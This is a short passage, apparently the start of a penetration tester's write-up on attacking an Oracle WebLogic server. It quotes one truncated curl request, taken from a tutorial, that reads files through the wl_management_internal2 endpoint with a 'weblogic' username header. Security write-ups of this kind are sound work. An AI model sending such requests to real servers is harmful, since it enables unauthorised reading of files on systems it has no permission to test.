During an external pentest – what a surprise – I found a WebLogic server with no interesting contents. I searched papers and tutorials about WebLogic hacking with little success. The public exploitation techniques resulted in only file reading. The OISSG tutorial only shows the following usable file reading solution:

curl -s http://127.0.0.1/wl_management_internal2/wl_management -H "username: weblogic" …